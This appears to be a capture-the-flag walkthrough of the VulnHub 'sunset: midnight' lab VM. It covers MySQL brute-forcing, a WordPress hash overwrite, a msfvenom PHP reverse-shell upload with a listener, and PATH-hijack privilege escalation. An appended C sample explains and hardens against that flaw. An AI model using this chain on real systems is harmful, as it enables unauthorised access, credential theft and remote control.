PJzhang: VulnHub target machine, sunset series, SUNSET: MIDNIGHT
Morning~~~
Address: https://www.vulnhub.com/entry/sunset-midnight,517/
The focus is on the tools and the approach.
nmap 192.168.43.0/24
Target IP: 192.168.43.113
nmap -A -p1-65535 192.168.43.113
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
Visiting http://192.168.43.113/ redirects to http://sunset-midnight/
vim /etc/hosts
192.168.43.113 sunset-midnight
Visiting http://sunset-midnight/ shows a WordPress site
http://sunset-midnight/wp-login.php
wpscan --url http://sunset-midnight/ --enumerate u
wpscan --url http://sunset-midnight/ -U admin -P mima.txt -t 100
hydra 192.168.43.113 mysql -l root -P /usr/share/wordlists/rockyou.txt -t 1
[3306][mysql] host: 192.168.43.113 login: root password: robert
If "unblock with 'mysqladmin flush-hosts'" appears, reboot the target machine and run the brute force again
mysql -uroot -p -h sunset-midnight
show databases;
use wordpress_db;
show tables;
select user_pass from wp_users;
The password is shown as $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/
The MD5 of 123456 is e10adc3949ba59abbe56e057f20f883e
update wp_users SET user_pass="e10adc3949ba59abbe56e057f20f883e" where id=1;
The WordPress admin login is now admin/123456
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw > muma.php
Appearance---Themes---upload muma.php
Visiting http://sunset-midnight/muma.php/ shows http://sunset-midnight/wp-content/uploads/2020/09/muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run
Visit http://sunset-midnight/wp-content/uploads/2020/09/muma.php to get the reverse shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@midnight:/var/www/html/wordpress/wp-content/uploads/2020/09$
cat /etc/passwd
jose:x:1000:1000:jose,,,:/home/jose:/bin/bash is worth noting
Go into /var/www/html/wordpress and look at wp-config.php
/** MySQL database username */
define( 'DB_USER', 'jose' );
/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
https://www.cmd5.com/
https://www.somd5.com/
sudo -l cannot be used
su jose
The password is 645dc5a8871d2a4269d4cbe23f6ae103
sudo -l does not work
Look for SUID files
find / -perm -u=s -type f 2>/dev/null
/usr/bin/status is worth noting
cd /tmp
echo "/bin/bash" > service
chmod 777 service
echo $PATH
export PATH=/tmp:$PATH
status
Root privileges obtained
root@midnight:/tmp#
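The PATH override above only works if /usr/bin/status runs `service` by bare name. The following is an added example, not code from the original post or from the target's binary, that assumes that behaviour and puts the vulnerable call beside a hardened one; `resolve_in_path`, `status_vulnerable`, `run_fixed` and the `service ssh status` arguments are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Report which file a bare command name resolves to under a given PATH,
 * using the left-to-right search system() and execvp() rely on. 0 = found. */
int resolve_in_path(const char *name, const char *path, char *out, size_t n)
{
    char *copy = strdup(path), *save = NULL;
    int rc = -1;
    if (!copy) return -1;
    for (char *d = strtok_r(copy, ":", &save); d; d = strtok_r(NULL, ":", &save)) {
        snprintf(out, n, "%s/%s", d, name);
        if (access(out, X_OK) == 0) { rc = 0; break; }
    }
    free(copy);
    return rc;
}

/* Assumed vulnerable pattern: a set-uid helper runs a bare command name
 * through the shell, so the caller's PATH picks the binary. */
int status_vulnerable(void) { return system("service ssh status"); }

/* Hardened pattern: absolute path only, no shell, fixed environment.
 * Returns the child's exit status, or -1 on refusal or error. */
int run_fixed(const char *abs_path, char *const argv[])
{
    char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    int st;
    if (abs_path[0] != '/') return -1;          /* refuse PATH lookups */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(abs_path, argv, envp); _exit(127); }
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

int main(void)
{
    char hit[4096];
    const char *path = getenv("PATH");
    if (path && resolve_in_path("service", path, hit, sizeof hit) == 0)
        printf("bare \"service\" resolves to %s\n", hit);
    char *const argv[] = { "service", "ssh", "status", NULL };
    printf("fixed-path exit status: %d\n", run_fixed("/usr/sbin/service", argv));
    return 0;
}
```

A set-uid program should also avoid system() entirely, since it hands the caller's whole environment to /bin/sh.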
cat user.txt, in the home directory
956a9564aa5632edca7b745c696f6575
